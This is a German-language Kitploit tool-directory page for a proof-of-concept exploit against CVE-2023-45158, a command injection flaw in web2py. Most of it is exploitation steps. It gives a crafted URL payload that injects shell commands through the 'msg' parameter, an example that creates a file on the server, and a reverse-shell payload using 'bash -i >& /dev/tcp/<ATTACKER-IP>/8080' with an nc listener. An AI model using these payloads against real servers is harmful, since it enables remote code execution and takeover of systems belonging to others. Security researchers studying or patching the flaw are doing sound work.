Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-45158 — Proof-of-concept-Exploit für CVE-2023-45158, eine Command Injection-Schwachstelle in web2py. Demonstriert Remote Code Execution mittels präparierter HTTP-Anfragen, einschließlich Dateierstellung und Reverse-Shell-Payloads. | Kitploit
Tools/GitHubGitHub/yifanzhg/cve-2023-45158
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubyifanzhg/cve-2023-45158

CVE-2023-45158

Proof-of-concept-Exploit für CVE-2023-45158, eine Command Injection-Schwachstelle in web2py. Demonstriert Remote Code Execution mittels präparierter HTTP-Anfragen, einschließlich Dateierstellung und Reverse-Shell-Payloads.

Repository anzeigen
41vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-45158

Schritte

  1. Starte den Webserver
root@kitploit:~
cd web2py
python3 web2py.py
  1. Injiziere deinen Befehl mit der URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Ersetze <IP-ADDRESS> und <YOUR-COMMAND> durch deine Werte.

Beispiele

  1. Erstelle eine Datei auf dem Server

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. Reverse Shell

Führe auf dem Angreifer-Rechner aus: nc -l 127.0.0.1 8080

Gehe zur URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Ersetze <ATTACKER-IP>.

Tool herunterladen